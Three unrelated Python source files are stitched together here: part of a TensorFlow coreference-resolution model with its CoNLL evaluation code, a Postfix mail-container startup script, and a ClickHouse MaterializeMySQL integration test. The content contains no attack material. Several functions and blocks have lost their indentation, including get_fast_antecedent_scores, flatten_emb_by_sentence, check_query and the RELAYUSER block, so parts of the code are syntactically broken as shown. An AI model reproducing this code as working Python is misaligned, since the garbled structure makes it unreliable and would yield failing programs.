        """Expensive pairwise antecedent scores via an FFNN over rich pair features.

        The pair representation is [span emb; antecedent emb; elementwise product;
        speaker/genre/distance feature embeddings].
        """
        k = util.shape(top_span_emb, 0)
        c = util.shape(top_antecedents, 1)
        feature_emb_list = []
        if self.config["use_metadata"]:
            # Binary same-speaker feature plus a document-genre embedding tiled per pair.
            top_antecedent_speaker_ids = tf.gather(top_span_speaker_ids, top_antecedents)  # [k, c]
            same_speaker = tf.equal(tf.expand_dims(top_span_speaker_ids, 1), top_antecedent_speaker_ids)  # [k, c]
            speaker_pair_emb = tf.gather(tf.get_variable("same_speaker_emb", [2, self.config["feature_size"]]),
                                         tf.to_int32(same_speaker))  # [k, c, emb]
            feature_emb_list.append(speaker_pair_emb)
            tiled_genre_emb = tf.tile(tf.expand_dims(tf.expand_dims(genre_emb, 0), 0), [k, c, 1])  # [k, c, emb]
            feature_emb_list.append(tiled_genre_emb)
        if self.config["use_features"]:
            """ i think of that if want to increase the distance of cluster pair, we can change the [10] antecedent_distance_emb,
            and the bucket_distance function.
            """
            # Distance between span and antecedent, bucketed into 10 semi-log bins.
            antecedent_distance_buckets = self.bucket_distance(top_antecedent_offsets)  # [k, c]
            antecedent_distance_emb = tf.gather(
                tf.get_variable("antecedent_distance_emb", [10, self.config["feature_size"]]),
                antecedent_distance_buckets)  # [k, c]
            feature_emb_list.append(antecedent_distance_emb)
        feature_emb = tf.concat(feature_emb_list, 2)  # [k, c, emb]
        feature_emb = tf.nn.dropout(feature_emb, self.dropout)  # [k, c, emb]
        target_emb = tf.expand_dims(top_span_emb, 1)  # [k, 1, emb]
        similarity_emb = top_antecedent_emb * target_emb  # [k, c, emb]
        target_emb = tf.tile(target_emb, [1, c, 1])  # [k, c, emb]
        pair_emb = tf.concat([target_emb, top_antecedent_emb, similarity_emb, feature_emb], 2)  # [k, c, emb]
        with tf.variable_scope("slow_antecedent_scores"):
            slow_antecedent_scores = util.ffnn(pair_emb, self.config["ffnn_depth"], self.config["ffnn_size"], 1,
                                               self.dropout)  # [k, c, 1]
        slow_antecedent_scores = tf.squeeze(slow_antecedent_scores, 2)  # [k, c]
        return slow_antecedent_scores  # [k, c]
def get_fast_antecedent_scores(self, top_span_emb):
with tf.variable_scope("src_projection"):
source_top_span_emb = tf.nn.dropout(util.projection(top_span_emb, util.shape(top_span_emb, -1)),
self.dropout) # [k, emb]
target_top_span_emb = tf.nn.dropout(top_span_emb, self.dropout) # [k, emb]
return tf.matmul(source_top_span_emb, target_top_span_emb, transpose_b=True) # [k, k]
def flatten_emb_by_sentence(self, emb, text_len_mask):
num_sentences = tf.shape(emb)[0]
max_sentence_length = tf.shape(emb)[1]
emb_rank = len(emb.get_shape())
if emb_rank == 2:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length])
elif emb_rank == 3:
flattened_emb = tf.reshape(emb, [num_sentences * max_sentence_length, util.shape(emb, 2)])
else:
raise ValueError("Unsupported rank: {}".format(emb_rank))
return tf.boolean_mask(flattened_emb, tf.reshape(text_len_mask, [num_sentences * max_sentence_length]))
    def lstm_contextualize(self, text_emb, text_len, text_len_mask):
        """Encode tokens with stacked bidirectional LSTM layers and flatten to word level.

        Layers beyond the first are combined with their input via a highway gate.
        Returns [num_words, emb] with padding positions removed.
        """
        num_sentences = tf.shape(text_emb)[0]
        current_inputs = text_emb  # [num_sentences, max_sentence_length, emb]
        for layer in range(self.config["contextualization_layers"]):
            with tf.variable_scope("layer_{}".format(layer)):
                with tf.variable_scope("fw_cell"):
                    cell_fw = util.CustomLSTMCell(self.config["contextualization_size"], num_sentences,
                                                  self.lstm_dropout)
                with tf.variable_scope("bw_cell"):
                    cell_bw = util.CustomLSTMCell(self.config["contextualization_size"], num_sentences,
                                                  self.lstm_dropout)
                # Broadcast each cell's learned initial state across all sentences in the batch.
                state_fw = tf.contrib.rnn.LSTMStateTuple(tf.tile(cell_fw.initial_state.c, [num_sentences, 1]),
                                                         tf.tile(cell_fw.initial_state.h, [num_sentences, 1]))
                state_bw = tf.contrib.rnn.LSTMStateTuple(tf.tile(cell_bw.initial_state.c, [num_sentences, 1]),
                                                         tf.tile(cell_bw.initial_state.h, [num_sentences, 1]))
                (fw_outputs, bw_outputs), _ = tf.nn.bidirectional_dynamic_rnn(
                    cell_fw=cell_fw,
                    cell_bw=cell_bw,
                    inputs=current_inputs,
                    sequence_length=text_len,
                    initial_state_fw=state_fw,
                    initial_state_bw=state_bw)
                text_outputs = tf.concat([fw_outputs, bw_outputs], 2)  # [num_sentences, max_sentence_length, emb]
                text_outputs = tf.nn.dropout(text_outputs, self.lstm_dropout)
                if layer > 0:
                    # Highway connection: gate between this layer's output and its input.
                    highway_gates = tf.sigmoid(util.projection(text_outputs, util.shape(text_outputs,
                                                                                        2)))  # [num_sentences, max_sentence_length, emb]
                    text_outputs = highway_gates * text_outputs + (1 - highway_gates) * current_inputs
                current_inputs = text_outputs
        return self.flatten_emb_by_sentence(text_outputs, text_len_mask)
def get_predicted_antecedents(self, antecedents, antecedent_scores):
    """Pick the best-scoring antecedent for every span.

    Args:
      antecedents: [num_spans, max_antecedents] candidate antecedent indices.
      antecedent_scores: [num_spans, max_antecedents + 1] scores, where
        column 0 is the "no antecedent" (dummy) option.

    Returns:
      A list with one entry per span: the chosen antecedent index, or -1
      when the dummy option wins.
    """
    # Subtracting 1 maps the dummy column to -1 and shifts real antecedent
    # columns to their positions in `antecedents`.
    best_indices = np.argmax(antecedent_scores, axis=1) - 1
    return [
        -1 if best < 0 else antecedents[span, best]
        for span, best in enumerate(best_indices)
    ]
def get_predicted_clusters(self, top_span_starts, top_span_ends, predicted_antecedents):
    """Build coreference clusters by following antecedent links.

    Args:
      top_span_starts / top_span_ends: per-span token offsets.
      predicted_antecedents: per-span antecedent index, -1 for "none".

    Returns:
      (predicted_clusters, mention_to_predicted): a list of mention tuples
      per cluster, and a map from each mention to its cluster tuple.
    """
    clusters = []  # each entry: list of (start, end) mentions
    mention_to_cluster_id = {}
    for span_idx, antecedent_idx in enumerate(predicted_antecedents):
        if antecedent_idx < 0:
            continue  # span links to nothing
        # Antecedents always precede the span that points at them.
        assert span_idx > antecedent_idx
        antecedent = (int(top_span_starts[antecedent_idx]), int(top_span_ends[antecedent_idx]))
        cluster_id = mention_to_cluster_id.get(antecedent)
        if cluster_id is None:
            # First time this antecedent appears: open a new cluster for it.
            cluster_id = len(clusters)
            clusters.append([antecedent])
            mention_to_cluster_id[antecedent] = cluster_id
        mention = (int(top_span_starts[span_idx]), int(top_span_ends[span_idx]))
        clusters[cluster_id].append(mention)
        mention_to_cluster_id[mention] = cluster_id
    predicted_clusters = [tuple(cluster) for cluster in clusters]
    mention_to_predicted = {
        mention: predicted_clusters[cid] for mention, cid in mention_to_cluster_id.items()
    }
    return predicted_clusters, mention_to_predicted
def evaluate_coref(self, top_span_starts, top_span_ends, predicted_antecedents, gold_clusters, evaluator):
    """Compare predicted clusters against gold clusters and feed the evaluator.

    Returns the predicted clusters so the caller can persist them.
    """
    # Normalize gold clusters to hashable tuples of (start, end) tuples.
    gold_clusters = [tuple(tuple(mention) for mention in cluster) for cluster in gold_clusters]
    # Reverse index: every gold mention points at its own cluster.
    mention_to_gold = {mention: cluster for cluster in gold_clusters for mention in cluster}
    predicted_clusters, mention_to_predicted = self.get_predicted_clusters(
        top_span_starts, top_span_ends, predicted_antecedents)
    evaluator.update(predicted_clusters, gold_clusters, mention_to_predicted, mention_to_gold)
    return predicted_clusters
def load_eval_data(self):
    """Lazily load and tensorize the eval examples from config["eval_path"].

    Populates self.eval_data as a list of (tensorized_example, raw_example)
    pairs on first call; subsequent calls are no-ops (simple cache).
    """
    if self.eval_data is None:
        def load_line(line):
            example = json.loads(line)
            return self.tensorize_example(example, is_training=False), example

        with open(self.config["eval_path"]) as f:
            # Iterate the file directly instead of readlines(); same lines,
            # no intermediate list.
            self.eval_data = [load_line(line) for line in f]
        # Removed an unused `num_words` aggregate that was computed and
        # immediately discarded in the original.
        print("Loaded {} eval examples.".format(len(self.eval_data)))
def evaluate(self, session, official_stdout=False):
    """Run coreference prediction over the eval set and report metrics.

    Runs the model on every cached eval example, scores the predicted
    clusters with the CoNLL scorer and the in-python evaluator, prints
    MUC / B-cubed / CEAF precision, recall and F1, and writes all
    predictions to a hard-coded Drive path.

    Returns:
      (tf summary, average py F1) — note the CoNLL average_f1 is computed
      but the *python* F1 is what gets returned.
    """
    self.load_eval_data()
    coref_predictions = {}
    coref_evaluator = metrics.CorefEvaluator()
    for example_num, (tensorized_example, example) in enumerate(self.eval_data):
        # Unpack only to document the tensor layout; feed_dict below uses the tuple as-is.
        tokens, context_word_emb, head_word_emb, lm_emb, char_index, text_len, speaker_ids, genre, is_training, gold_starts, gold_ends, _, sentence_index_start, sentence_index_end = tensorized_example
        # print('tokens', tokens, tokens.shape)
        # print('context_word_emb', context_word_emb, context_word_emb.shape)
        # print('head_word_emb', head_word_emb, head_word_emb.shape)
        # print('lm', lm_emb, lm_emb.shape)
        feed_dict = {i: t for i, t in zip(self.input_tensors, tensorized_example)}
        candidate_span_emb, candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores = session.run(
            self.predictions, feed_dict=feed_dict)
        # print('candidate_starts', candidate_starts)
        # print('end', candidate_ends)
        # print('top_span_starts', top_span_starts, top_span_ends.shape)
        # print('top_span_end', top_span_ends, top_span_ends.shape)
        # print('top_antecedent_scores', top_antecedent_scores)
        predicted_antecedents = self.get_predicted_antecedents(top_antecedents, top_antecedent_scores)
        # print('predicted_antecedents', predicted_antecedents)
        coref_predictions[example["doc_key"]] = self.evaluate_coref(top_span_starts, top_span_ends,
                                                                    predicted_antecedents, example["clusters"],
                                                                    coref_evaluator)
        if example_num % 10 == 0:
            print("Evaluated {}/{} examples.".format(example_num + 1, len(self.eval_data)))
    print('coref_predictions:', coref_predictions, len(coref_predictions))
    # NOTE(review): output path is hard-coded to a Colab/Drive mount — consider
    # making it configurable.
    tools.write_json('/content/drive/My Drive/coreference/e2e/e2e-coref/coref_predictions.json',
                     coref_predictions)
    """this evaluation code is used to solve CoNLL style dataset evaluetions."""
    summary_dict = {}
    conll_results = conll.evaluate_conll(self.config["conll_eval_path"], coref_predictions, official_stdout)
    # Computed but currently unused (reporting lines below are commented out).
    average_f1 = sum(results["f"] for results in conll_results.values()) / len(conll_results)
    # summary_dict["Average F1 (conll)"] = average_f1
    # print("Average F1 (conll): {:.2f}%".format(average_f1))
    p, r, f = coref_evaluator.get_prf()
    summary_dict["Average F1 (py)"] = f
    print("Average F1 (py): {:.2f}%".format(f * 100))
    summary_dict["Average precision (py)"] = p
    print("Average precision (py): {:.2f}%".format(p * 100))
    summary_dict["Average recall (py)"] = r
    print("Average recall (py): {:.2f}%".format(r * 100))
    # Per-metric breakdown (MUC / B-cubed / CEAF).
    muc_p, b_p, ceaf_p = coref_evaluator.get_all_precision()
    muc_r, b_r, ceaf_r = coref_evaluator.get_all_recall()
    muc_f1, b_f1, ceaf_f1 = coref_evaluator.get_all_f1()
    print('\n', "Precision:", "\n")
    print("muc:", "{:.2f}%".format(muc_p * 100), '\n')
    print("b_cube:", "{:.2f}%".format(b_p * 100), '\n')
    print("ceaf:", "{:.2f}%".format(ceaf_p * 100), '\n')
    print('\n', "Recall:", "\n")
    print("muc:", "{:.2f}%".format(muc_r * 100), '\n')
    print("b_cube:", "{:.2f}%".format(b_r * 100), '\n')
    print("ceaf:", "{:.2f}%".format(ceaf_r * 100), '\n')
    print('\n', "F1:", "\n")
    print("muc:", "{:.2f}%".format(muc_f1 * 100), '\n')
    print("b_cube:", "{:.2f}%".format(b_f1 * 100), '\n')
    print("ceaf:", "{:.2f}%".format(ceaf_f1 * 100), '\n')
    return util.make_summary(summary_dict), f
# def evaluate_neuralcoref(self, session, official_stdout=False):
# self.load_eval_data()
# coref_predictions = {}
# coref_evaluator = metrics.CorefEvaluator()
# import re
# fuhao = re.compile(r'[\,|\.|\?|\!|\']')
# for example_num, (tensorized_example, example) in enumerate(self.eval_data):
# # _, _, _, _, _, _, _, _, _, gold_starts, gold_ends, _ = tensorized_example
# # feed_dict = {i:t for i,t in zip(self.input_tensors, tensorized_example)}
# # candidate_starts, candidate_ends, candidate_mention_scores, top_span_starts, top_span_ends, top_antecedents, top_antecedent_scores = session.run(self.predictions, feed_dict=feed_dict)
# ss1 = sum(example["sentences"], [])
# ss = ''
# for idx, i in enumerate(ss1):
# if fuhao.match(i) or idx == 0:
# ss = ss + i
# elif idx != 0:
# ss = ss + ' ' + i
# doc = nlp(ss)
# # predicted_antecedents = self.get_predicted_antecedents(top_antecedents, top_antecedent_scores)
# if not doc._.has_coref:
# coref_predictions[example["doc_key"]] = []
# continue
# # sample : [((16, 16), (19, 23)), ((25, 27), (42, 44), (57, 59)), ((65, 66), (82, 83), (101, 102))]
# predictions = []
# top_span_starts = []
# top_span_ends = []
# lookup = {}
# conll_token_index = 0
# conll_ci = 0
# spacy_ci = 0
# print()
# print('ss', ss)
# for i in range(len(doc)):
# st = doc[i].text
# print(st)
# spacy_ci += len(st)
# while conll_ci < spacy_ci:
# conll_ci += len(ss1[conll_token_index])
# conll_token_index += 1
# lookup[i] = conll_token_index - 1
# print(lookup)
# for cluster in doc._.coref_clusters:
# _tmp = []
# print('cluster:', cluster)
# for mention in cluster:
# print('mention:', mention)
# print('start:', mention.start)
# print('end:', mention.end)
# print(ss[mention.start:mention.end])
# print('look:', ss[lookup[mention.start]:lookup[mention.end]])
# # print()
# _tmp.append((lookup[mention.start], lookup[mention.end - 1]))
# top_span_starts.append(mention.start)
# top_span_ends.append(mention.end - 1)
# predictions.append(tuple(_tmp))
# # print(predictions)
# coref_predictions[example["doc_key"]] = predictions
# # print(coref_predictions)
# if example_num % 10 == 0:
# print("Evaluated {}/{} examples.".format(example_num + 1, len(self.eval_data)))
#
# summary_dict = {}
# conll_results = conll.evaluate_conll(self.config["conll_eval_path"], coref_predictions, official_stdout)
# average_f1 = sum(results["f"] for results in conll_results.values()) / len(conll_results)
# summary_dict["Average F1 (conll)"] = average_f1
# print("Average F1 (conll): {:.2f}%".format(average_f1))
#
# p, r, f = coref_evaluator.get_prf()
# summary_dict["Average F1 (py)"] = f
# print("Average F1 (py): {:.2f}%".format(f * 100))
# summary_dict["Average precision (py)"] = p
# print("Average precision (py): {:.2f}%".format(p * 100))
# summary_dict["Average recall (py)"] = r
# print("Average recall (py): {:.2f}%".format(r * 100))
#
# return util.make_summary(summary_dict), average_f1 |
start.py | #!/usr/bin/python3
import os
import glob
import shutil
import multiprocessing
import logging as log
import sys
from podop import run_server
from pwd import getpwnam
from socrate import system, conf
log.basicConfig(stream=sys.stderr, level=os.environ.get("LOG_LEVEL", "WARNING"))
def start_podop():
    """Drop privileges to the postfix user and serve the Podop lookup tables.

    Each table is resolved over HTTP against the admin container; the `§`
    placeholder is filled in by Podop with the key being looked up.
    """
    os.setuid(getpwnam('postfix').pw_uid)
    os.mkdir('/dev/shm/postfix',mode=0o700)
    url = "http://" + os.environ["ADMIN_ADDRESS"] + "/internal/postfix/"
    # (table name, admin endpoint suffix) pairs served over the socket.
    endpoints = [
        ("transport", "transport/§"),
        ("alias", "alias/§"),
        ("domain", "domain/§"),
        ("mailbox", "mailbox/§"),
        ("recipientmap", "recipient/map/§"),
        ("sendermap", "sender/map/§"),
        ("senderaccess", "sender/access/§"),
        ("senderlogin", "sender/login/§"),
        ("senderrate", "sender/rate/§"),
    ]
    # TODO: Remove verbosity setting from Podop?
    run_server(0, "postfix", "/tmp/podop.socket",
               [(name, "url", url + suffix) for name, suffix in endpoints])
def is_valid_postconf_line(line):
    """Return True for override lines worth passing to postconf.

    Empty lines and `#` comment lines are skipped.
    """
    return line != '' and not line.startswith("#")
# Actual startup script
# Resolve peer-service addresses once and export them for the config templates.
os.environ["FRONT_ADDRESS"] = system.get_host_address_from_environment("FRONT", "front")
os.environ["ADMIN_ADDRESS"] = system.get_host_address_from_environment("ADMIN", "admin")
os.environ["ANTISPAM_MILTER_ADDRESS"] = system.get_host_address_from_environment("ANTISPAM_MILTER", "antispam:11332")
os.environ["LMTP_ADDRESS"] = system.get_host_address_from_environment("LMTP", "imap:2525")
os.environ["OUTCLEAN"] = os.environ["HOSTNAMES"].split(",")[0]
try:
    _to_lookup = os.environ["OUTCLEAN"]
    # Ensure we lookup a FQDN: @see #1884
    if not _to_lookup.endswith('.'):
        _to_lookup += '.'
    os.environ["OUTCLEAN_ADDRESS"] = system.resolve_hostname(_to_lookup)
except Exception:
    # DNS resolution is best-effort: fall back to a placeholder address rather
    # than aborting container startup. Was a bare `except:`, which would also
    # swallow SystemExit/KeyboardInterrupt — narrowed to Exception.
    os.environ["OUTCLEAN_ADDRESS"] = "10.10.10.10"
# Render the postfix configuration templates into /etc/postfix.
for postfix_file in glob.glob("/conf/*.cf"):
    conf.jinja(postfix_file, os.environ, os.path.join("/etc/postfix", os.path.basename(postfix_file)))
# Apply user-provided main.cf overrides line by line via postconf.
if os.path.exists("/overrides/postfix.cf"):
    for line in open("/overrides/postfix.cf").read().strip().split("\n"):
        if is_valid_postconf_line(line):
            os.system('postconf -e "{}"'.format(line))
# Apply master.cf overrides via postconf -M.
if os.path.exists("/overrides/postfix.master"):
    for line in open("/overrides/postfix.master").read().strip().split("\n"):
        if is_valid_postconf_line(line):
            os.system('postconf -Me "{}"'.format(line))
# Compile user lookup tables with postmap, then remove the plain-text source.
for map_file in glob.glob("/overrides/*.map"):
    destination = os.path.join("/etc/postfix", os.path.basename(map_file))
    shutil.copyfile(map_file, destination)
    os.system("postmap {}".format(destination))
    os.remove(destination)
# Seed a default TLS policy map (force `secure` verification for well-known
# providers) unless one was already compiled.
if not os.path.exists("/etc/postfix/tls_policy.map.db"):
    with open("/etc/postfix/tls_policy.map", "w") as f:
        for domain in ['gmail.com', 'yahoo.com', 'hotmail.com', 'aol.com', 'outlook.com', 'comcast.net', 'icloud.com', 'msn.com', 'hotmail.co.uk', 'live.com', 'yahoo.co.in', 'me.com', 'mail.ru', 'cox.net', 'yahoo.co.uk', 'verizon.net', 'ymail.com', 'hotmail.it', 'kw.com', 'yahoo.com.tw', 'mac.com', 'live.se', 'live.nl', 'yahoo.com.br', 'googlemail.com', 'libero.it', 'web.de', 'allstate.com', 'btinternet.com', 'online.no', 'yahoo.com.au', 'live.dk', 'earthlink.net', 'yahoo.fr', 'yahoo.it', 'gmx.de', 'hotmail.fr', 'shawinc.com', 'yahoo.de', 'moe.edu.sg', 'naver.com', 'bigpond.com', 'statefarm.com', 'remax.net', 'rocketmail.com', 'live.no', 'yahoo.ca', 'bigpond.net.au', 'hotmail.se', 'gmx.at', 'live.co.uk', 'mail.com', 'yahoo.in', 'yandex.ru', 'qq.com', 'charter.net', 'indeedemail.com', 'alice.it', 'hotmail.de', 'bluewin.ch', 'optonline.net', 'wp.pl', 'yahoo.es', 'hotmail.no', 'pindotmedia.com', 'orange.fr', 'live.it', 'yahoo.co.id', 'yahoo.no', 'hotmail.es', 'morganstanley.com', 'wellsfargo.com', 'wanadoo.fr', 'facebook.com', 'yahoo.se', 'fema.dhs.gov', 'rogers.com', 'yahoo.com.hk', 'live.com.au', 'nic.in', 'nab.com.au', 'ubs.com', 'shaw.ca', 'umich.edu', 'westpac.com.au', 'yahoo.com.mx', 'yahoo.com.sg', 'farmersagent.com', 'yahoo.dk', 'dhs.gov']:
            f.write(f'{domain}\tsecure\n')
    os.system("postmap /etc/postfix/tls_policy.map")
if "RELAYUSER" in os.environ:
path = "/etc/postfix/sasl_passwd"
conf.jinja("/conf/sasl_passwd", os.environ, path)
os.system("postmap {}".format(path))
# Run Podop and Postfix
multiprocessing.Process(target=start_podop).start()
os.system("/usr/libexec/postfix/post-install meta_directory=/etc/postfix create-missing")
# Before starting postfix, we need to check permissions on /queue
# in the event that postfix,postdrop id have changed
os.system("postfix set-permissions")
os.system("postfix start-fg")
|
materialize_with_ddl.py | import time
import pymysql.cursors
import pytest
from helpers.network import PartitionManager
import pytest
from helpers.client import QueryRuntimeException
from helpers.cluster import get_docker_compose_path, run_and_check
import random
import threading
from multiprocessing.dummy import Pool
def check_query(clickhouse_node, query, result_set, retry_count=60, interval_seconds=3):
lastest_result = ''
for i in range(retry_count):
try:
lastest_result = clickhouse_node.query(query)
if result_set == lastest_result:
return
print(lastest_result)
time.sleep(interval_seconds)
except Exception as e:
print(("check_query retry {} exception {}".format(i + 1, e)))
time.sleep(interval_seconds)
else:
assert clickhouse_node.query(query) == result_set
def dml_with_materialize_mysql_database(clickhouse_node, mysql_node, service_name):
    """Check DML replication through a MaterializeMySQL database.

    Covers: a wide-typed table created (and populated) before the mapping
    exists, INSERTs after the mapping, UPDATE of an ordinary column, UPDATE
    of the primary key, and DELETEs. Cleans up both databases at the end.
    """
    mysql_node.query("DROP DATABASE IF EXISTS test_database")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
    mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
    # existed before the mapping was created
    mysql_node.query("CREATE TABLE test_database.test_table_1 ("
                     "`key` INT NOT NULL PRIMARY KEY, "
                     "unsigned_tiny_int TINYINT UNSIGNED, tiny_int TINYINT, "
                     "unsigned_small_int SMALLINT UNSIGNED, small_int SMALLINT, "
                     "unsigned_medium_int MEDIUMINT UNSIGNED, medium_int MEDIUMINT, "
                     "unsigned_int INT UNSIGNED, _int INT, "
                     "unsigned_integer INTEGER UNSIGNED, _integer INTEGER, "
                     "unsigned_bigint BIGINT UNSIGNED, _bigint BIGINT, "
                     "/* Need ClickHouse support read mysql decimal unsigned_decimal DECIMAL(19, 10) UNSIGNED, _decimal DECIMAL(19, 10), */"
                     "unsigned_float FLOAT UNSIGNED, _float FLOAT, "
                     "unsigned_double DOUBLE UNSIGNED, _double DOUBLE, "
                     "_varchar VARCHAR(10), _char CHAR(10), binary_col BINARY(8), "
                     "/* Need ClickHouse support Enum('a', 'b', 'v') _enum ENUM('a', 'b', 'c'), */"
                     "_date Date, _datetime DateTime, _timestamp TIMESTAMP, _bool BOOLEAN) ENGINE = InnoDB;")
    # it already has some data
    mysql_node.query("""
    INSERT INTO test_database.test_table_1 VALUES(1, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
    '2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', true);
    """)
    clickhouse_node.query(
        "CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(
            service_name))
    assert "test_database" in clickhouse_node.query("SHOW DATABASES")
    # Pre-existing row must be visible after the initial dump.
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table_1 ORDER BY key FORMAT TSV",
                "1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
                "2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n")
    mysql_node.query("""
    INSERT INTO test_database.test_table_1 VALUES(2, 1, -1, 2, -2, 3, -3, 4, -4, 5, -5, 6, -6, 3.2, -3.2, 3.4, -3.4, 'varchar', 'char', 'binary',
    '2020-01-01', '2020-01-01 00:00:00', '2020-01-01 00:00:00', false);
    """)
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table_1 ORDER BY key FORMAT TSV",
                "1\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
                "2020-01-01 00:00:00\t2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
                "varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t2020-01-01 00:00:00\t0\n")
    mysql_node.query("UPDATE test_database.test_table_1 SET unsigned_tiny_int = 2 WHERE `key` = 1")
    check_query(clickhouse_node, """
    SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,
    small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer,
    unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col,
    _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */
    _bool FROM test_database.test_table_1 ORDER BY key FORMAT TSV
    """,
                "1\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
                "2020-01-01 00:00:00\t1\n2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
                "varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n")
    # update primary key
    mysql_node.query("UPDATE test_database.test_table_1 SET `key` = 3 WHERE `unsigned_tiny_int` = 2")
    check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
                                 " small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
                                 " unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
                                 " _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
                                 " _bool FROM test_database.test_table_1 ORDER BY key FORMAT TSV",
                "2\t1\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\t"
                "varchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t0\n3\t2\t-1\t2\t-2\t3\t-3\t"
                "4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t2020-01-01 00:00:00\t1\n")
    mysql_node.query('DELETE FROM test_database.test_table_1 WHERE `key` = 2')
    check_query(clickhouse_node, "SELECT key, unsigned_tiny_int, tiny_int, unsigned_small_int,"
                                 " small_int, unsigned_medium_int, medium_int, unsigned_int, _int, unsigned_integer, _integer, "
                                 " unsigned_bigint, _bigint, unsigned_float, _float, unsigned_double, _double, _varchar, _char, binary_col, "
                                 " _date, _datetime, /* exclude it, because ON UPDATE CURRENT_TIMESTAMP _timestamp, */ "
                                 " _bool FROM test_database.test_table_1 ORDER BY key FORMAT TSV",
                "3\t2\t-1\t2\t-2\t3\t-3\t4\t-4\t5\t-5\t6\t-6\t3.2\t-3.2\t3.4\t-3.4\tvarchar\tchar\tbinary\\0\\0\t2020-01-01\t"
                "2020-01-01 00:00:00\t1\n")
    mysql_node.query('DELETE FROM test_database.test_table_1 WHERE `unsigned_tiny_int` = 2')
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table_1 ORDER BY key FORMAT TSV", "")
    clickhouse_node.query("DROP DATABASE test_database")
    mysql_node.query("DROP DATABASE test_database")
def materialize_mysql_database_with_datetime_and_decimal(clickhouse_node, mysql_node, service_name):
    """Check replication of fractional DATETIME/TIMESTAMP and wide DECIMAL values.

    test_table_1 exists before the mapping (initial dump path); test_table_2
    is created after it (binlog path). Expected TSV shows MySQL's rounding of
    sub-precision fractional seconds.
    """
    mysql_node.query("DROP DATABASE IF EXISTS test_database")
    clickhouse_node.query("DROP DATABASE IF EXISTS test_database")
    mysql_node.query("CREATE DATABASE test_database DEFAULT CHARACTER SET 'utf8'")
    mysql_node.query("CREATE TABLE test_database.test_table_1 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
    mysql_node.query("INSERT INTO test_database.test_table_1 VALUES(1, '2020-01-01 01:02:03.999999', '2020-01-01 01:02:03.999', " + ('9' * 35) + "." + ('9' * 30) + ")")
    mysql_node.query("INSERT INTO test_database.test_table_1 VALUES(2, '2020-01-01 01:02:03.000000', '2020-01-01 01:02:03.000', ." + ('0' * 29) + "1)")
    mysql_node.query("INSERT INTO test_database.test_table_1 VALUES(3, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.99', -" + ('9' * 35) + "." + ('9' * 30) + ")")
    mysql_node.query("INSERT INTO test_database.test_table_1 VALUES(4, '2020-01-01 01:02:03.9999', '2020-01-01 01:02:03.9999', -." + ('0' * 29) + "1)")
    clickhouse_node.query("CREATE DATABASE test_database ENGINE = MaterializeMySQL('{}:3306', 'test_database', 'root', 'clickhouse')".format(service_name))
    assert "test_database" in clickhouse_node.query("SHOW DATABASES")
    check_query(clickhouse_node, "SELECT * FROM test_database.test_table_1 ORDER BY key FORMAT TSV",
                "1\t2020-01-01 01:02:03.999999\t2020-01-01 01:02:03.999\t" + ('9' * 35) + "." + ('9' * 30) + "\n"
                "2\t2020-01-01 01:02:03.000000\t2020-01-01 01:02:03.000\t0." + ('0' * 29) + "1\n"
                "3\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:03.990\t-" + ('9' * 35) + "." + ('9' * 30) + "\n"
                "4\t2020-01-01 01:02:03.999900\t2020-01-01 01:02:04.000\t-0." + ('0' * 29) + "1\n")
    mysql_node.query("CREATE TABLE test_database.test_table_2 (`key` INT NOT NULL PRIMARY KEY, _datetime DateTime(6), _timestamp TIMESTAMP(3), _decimal DECIMAL(65, 30)) ENGINE = InnoDB;")
